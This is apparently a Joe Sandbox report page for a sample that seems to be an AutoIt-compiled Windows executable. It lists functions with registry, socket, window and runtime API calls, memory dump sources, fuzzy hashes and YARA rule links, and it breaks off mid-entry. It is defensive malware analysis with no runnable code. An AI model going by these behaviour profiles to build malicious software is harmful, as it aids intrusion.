                                                                  • Instruction ID: 978ed226c4c740cf21ef25292429ee16e955d52fa023d5a134bb0b2bbe363a1f
                                                                  • Opcode Fuzzy Hash: 8e8e94aa30fa6ae8472353f6edfbd6cb1c4ffb793f7e269d98befe6efac23352
                                                                  • Instruction Fuzzy Hash: 7E412C76A04208EFDB20DF90E984EAABBF8FB04314F148529FD19A7290D730AD50EF50
                                                                  Function 00970FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00970FD4
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00970FFE
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 009710B5
                                                                    • Part of subcall function 00970FA5: RegCloseKey.ADVAPI32(?), ref: 0097101B
                                                                    • Part of subcall function 00970FA5: FreeLibrary.KERNEL32(?), ref: 0097106D
                                                                    • Part of subcall function 00970FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00971090
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00971058
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                  • String ID:
                                                                  • API String ID: 395352322-0
                                                                  • Opcode ID: 72163e5b4a970c2f84a65c8d7bb35cc2e744eb13f5ad8f810cd361c4c43cc2e3
                                                                  • Instruction ID: dcc74e182f1aec493af670f27e0b2d83763b70de6cfb1f926112e49ad5cae9e8
                                                                  • Opcode Fuzzy Hash: 72163e5b4a970c2f84a65c8d7bb35cc2e744eb13f5ad8f810cd361c4c43cc2e3
                                                                  • Instruction Fuzzy Hash: 2B312DB2911109FFDB25DF94DC99EFFB7BCEF08300F004169E509A2241EB749E859AA0
                                                                  Function 009762CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009762EC
                                                                  • GetWindowLongW.USER32(01394E50,000000F0), ref: 0097631F
                                                                  • GetWindowLongW.USER32(01394E50,000000F0), ref: 00976354
                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00976386
                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009763B0
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 009763C1
                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009763DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 2178440468-0
                                                                  • Opcode ID: 5ad4e1b597b50922fcee5f8c35f5f8494771dd867d4596a438b833fe3126d775
                                                                  • Instruction ID: a769acb562244a42323601f81cfbb4f269f7bbd69f0c72c1246d1c94372a8774
                                                                  • Opcode Fuzzy Hash: 5ad4e1b597b50922fcee5f8c35f5f8494771dd867d4596a438b833fe3126d775
                                                                  • Instruction Fuzzy Hash: EA313632608545DFDB21CF59DC84F543BE5FB4A724F1981A8F5189F2B1CB72A840EB50
                                                                  Function 0094DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0094DB2E
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0094DB54
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0094DB57
                                                                  • SysAllocString.OLEAUT32(?), ref: 0094DB75
                                                                  • SysFreeString.OLEAUT32(?), ref: 0094DB7E
                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 0094DBA3
                                                                  • SysAllocString.OLEAUT32(?), ref: 0094DBB1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                  • String ID:
                                                                  • API String ID: 3761583154-0
                                                                  • Opcode ID: 4b29bb5df09ff031392afcda79d79b9e2770dd115c7a69ef82090a0b0e61ed66
                                                                  • Instruction ID: 2964515fecc39f42560a5e855174646bba4b96591916b8865d9332237eab5bc9
                                                                  • Opcode Fuzzy Hash: 4b29bb5df09ff031392afcda79d79b9e2770dd115c7a69ef82090a0b0e61ed66
                                                                  • Instruction Fuzzy Hash: 7321A13A605219AFDF10DFA9DC88CBB73ACFB49360B018535F918DB2A1D674DC8197A4
                                                                  Function 00966173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00967D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00967DB6
                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009661C6
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009661D5
                                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0096620E
                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00966217
                                                                  • WSAGetLastError.WSOCK32 ref: 00966221
                                                                  • closesocket.WSOCK32(00000000), ref: 0096624A
                                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00966263
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 910771015-0
                                                                  • Opcode ID: f6e123a542827e3847401944e057f0da4f29e16161dd8a2dcb6ef542d7e5fd23
                                                                  • Instruction ID: 434e8c789be86d7a02af0de444f131c543ca88daaadc782cecab9283607797f6
                                                                  • Opcode Fuzzy Hash: f6e123a542827e3847401944e057f0da4f29e16161dd8a2dcb6ef542d7e5fd23
                                                                  • Instruction Fuzzy Hash: FE31CF32604108ABDF10AF64CC95FBE7BACEB45760F044029F919E7291CB74AD449BA2
                                                                  Function 0094F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                  • API String ID: 1038674560-2734436370
                                                                  • Opcode ID: df6f9807a8969a813020795fafacc4d03b6846abc271e117b57274013f65a17b
                                                                  • Instruction ID: dae308acd2e098a0109da850b4a54e540b50a43d2cfbc42e39c19615611fe942
                                                                  • Opcode Fuzzy Hash: df6f9807a8969a813020795fafacc4d03b6846abc271e117b57274013f65a17b
                                                                  • Instruction Fuzzy Hash: 3E21767220521B6AD720BB34AC22FB7739CEF95308F11443AF94686191EB999D82D3A5
                                                                  Function 0094DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0094DC09
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0094DC2F
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0094DC32
                                                                  • SysAllocString.OLEAUT32 ref: 0094DC53
                                                                  • SysFreeString.OLEAUT32 ref: 0094DC5C
                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 0094DC76
                                                                  • SysAllocString.OLEAUT32(?), ref: 0094DC84
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                  • String ID:
                                                                  • API String ID: 3761583154-0
                                                                  • Opcode ID: 3dc756ad0aa1fcfbdb24b82fd432d46ad0aab682e3771322b26c835e9a17f374
                                                                  • Instruction ID: 9555990790606f4141cc215dc2c71720055702b38305b81823980d9dedb9cd40
                                                                  • Opcode Fuzzy Hash: 3dc756ad0aa1fcfbdb24b82fd432d46ad0aab682e3771322b26c835e9a17f374
                                                                  • Instruction Fuzzy Hash: 4321B63A209204AF9B10DFA8DCC8DAB77ECFB48361B108125F958DB260D6B4DC81D764
                                                                  Function 009775CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008F1D73
                                                                    • Part of subcall function 008F1D35: GetStockObject.GDI32(00000011), ref: 008F1D87
                                                                    • Part of subcall function 008F1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008F1D91
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00977632
                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0097763F
                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0097764A
                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00977659
                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00977665
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                  • String ID: Msctls_Progress32
                                                                  • API String ID: 1025951953-3636473452
                                                                  • Opcode ID: 299e5f037310215f394627868f8dd1ea4b14185c60c693f13fb4de99be3257ff
                                                                  • Instruction ID: f057fe706d158086adc9f54d559b3e84c1a8874690cd3493fa9200185c2febf9
                                                                  • Opcode Fuzzy Hash: 299e5f037310215f394627868f8dd1ea4b14185c60c693f13fb4de99be3257ff
                                                                  • Instruction Fuzzy Hash: 631193B211021DBFEF119F64CC85EE7BF6DFF48798F014114B608A2050CA729C21DBA4
                                                                  Function 00919AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __init_pointers.LIBCMT ref: 00919AE6
                                                                    • Part of subcall function 00913187: EncodePointer.KERNEL32(00000000), ref: 0091318A
                                                                    • Part of subcall function 00913187: __initp_misc_winsig.LIBCMT ref: 009131A5
                                                                    • Part of subcall function 00913187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00919EA0
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00919EB4
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00919EC7
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00919EDA
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00919EED
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00919F00
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00919F13
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00919F26
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00919F39
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00919F4C
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00919F5F
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00919F72
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00919F85
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00919F98
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00919FAB
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00919FBE
                                                                  • __mtinitlocks.LIBCMT ref: 00919AEB
                                                                  • __mtterm.LIBCMT ref: 00919AF4
                                                                    • Part of subcall function 00919B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00919AF9,00917CD0,009AA0B8,00000014), ref: 00919C56
                                                                    • Part of subcall function 00919B5C: _free.LIBCMT ref: 00919C5D
                                                                    • Part of subcall function 00919B5C: DeleteCriticalSection.KERNEL32(009AEC00,?,?,00919AF9,00917CD0,009AA0B8,00000014), ref: 00919C7F
                                                                  • __calloc_crt.LIBCMT ref: 00919B19
                                                                  • __initptd.LIBCMT ref: 00919B3B
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00919B42
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                  • String ID:
                                                                  • API String ID: 3567560977-0
                                                                  • Opcode ID: 4c4a6753facf8f76adf7d1ce97f2ced57e75eadc1a4b24414d3c1ddded22359b
                                                                  • Instruction ID: 336f89c9a03a7d3c9380b083ab9087be2c96adfa1b561d4979029fc66225b1b0
                                                                  • Opcode Fuzzy Hash: 4c4a6753facf8f76adf7d1ce97f2ced57e75eadc1a4b24414d3c1ddded22359b
                                                                  • Instruction Fuzzy Hash: 18F09032B5D7196AF634B774BC237CB26949F82734F204A19F464DA1D2EF2085C141A0
                                                                  Function 0091406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00913F85), ref: 00914085
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0091408C
                                                                  • EncodePointer.KERNEL32(00000000), ref: 00914097
                                                                  • DecodePointer.KERNEL32(00913F85), ref: 009140B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                  • String ID: RoUninitialize$combase.dll
                                                                  • API String ID: 3489934621-2819208100
                                                                  • Opcode ID: 052d1c7cc1387df2c07c62aaa5a762a597c7e3af1fe084cc23f457379b33d377
                                                                  • Instruction ID: fbeea6372d3dd8291a4c3f943d46e00eec0bb51f6bb5655036dcc6df1998fc2b
                                                                  • Opcode Fuzzy Hash: 052d1c7cc1387df2c07c62aaa5a762a597c7e3af1fe084cc23f457379b33d377
                                                                  • Instruction Fuzzy Hash: 56E046716AC300EFEB10EF65EE0DB413AACFB08792F108124F105F11A0CBB28280EB10
                                                                  Function 009564B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 3253778849-0
                                                                  • Opcode ID: 07f7beecbd1dd8334db84aaf9af2abfb4d3119d97a414b28777fd7aaa104b083
                                                                  • Instruction ID: b2bcf3ff4a2715f4929cf56b4fcf8ca96849b2d9039f4710b9c6b90d09f45687
                                                                  • Opcode Fuzzy Hash: 07f7beecbd1dd8334db84aaf9af2abfb4d3119d97a414b28777fd7aaa104b083
                                                                  • Instruction Fuzzy Hash: 1F618B3060025E9BCF01EF65CC82FFE3BA9EF89308F444928FD599B192DA759849CB51
                                                                  Function 009701E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                    • Part of subcall function 00970E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096FDAD,?,?), ref: 00970E31
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009702BD
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009702FD
                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00970320
                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00970349
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0097038C
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00970399
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                  • String ID:
                                                                  • API String ID: 4046560759-0
                                                                  • Opcode ID: a42ebe339f9808213cdfc32782271632d128e5b48eb5f21510b561546d4c5726
                                                                  • Instruction ID: 4a598a43fb94c942490d285112a58735954052756426d60d30e01c76d304369c
                                                                  • Opcode Fuzzy Hash: a42ebe339f9808213cdfc32782271632d128e5b48eb5f21510b561546d4c5726
                                                                  • Instruction Fuzzy Hash: 6E516A32208204DFC714EF68C895E6EBBE8FF85314F04891DF5999B2A2DB31E944CB52
                                                                  Function 00975799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMenu.USER32(?), ref: 009757FB
                                                                  • GetMenuItemCount.USER32(00000000), ref: 00975832
                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0097585A
                                                                  • GetMenuItemID.USER32(?,?), ref: 009758C9
                                                                  • GetSubMenu.USER32(?,?), ref: 009758D7
                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00975928
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                  • String ID:
                                                                  • API String ID: 650687236-0
                                                                  • Opcode ID: 86ea23961fabfbff49ac89e441375c9d8c585961a0b679ca606a1b224827b950
                                                                  • Instruction ID: 9de8f50eff236957422bf05e4774bf20bfab3dc0c95a1b2210fae5c6e42079ba
                                                                  • Opcode Fuzzy Hash: 86ea23961fabfbff49ac89e441375c9d8c585961a0b679ca606a1b224827b950
                                                                  • Instruction Fuzzy Hash: 7F515A32E00619EFCF11EF64C845AEEB7B4EF48320F118469E949BB351CB75AE418B91
                                                                  Function 0094EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 0094EF06
                                                                  • VariantClear.OLEAUT32(00000013), ref: 0094EF78
                                                                  • VariantClear.OLEAUT32(00000000), ref: 0094EFD3
                                                                  • _memmove.LIBCMT ref: 0094EFFD
                                                                  • VariantClear.OLEAUT32(?), ref: 0094F04A
                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0094F078
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                                  • String ID:
                                                                  • API String ID: 1101466143-0
                                                                  • Opcode ID: 1c1e7db052f193df5016788006c7436200b3ac5683a68b9fe83e26952fdd57c1
                                                                  • Instruction ID: 9905d05d7cc01529a2962af6f04b731653c86e48690c8c9fd046f4624d6853c7
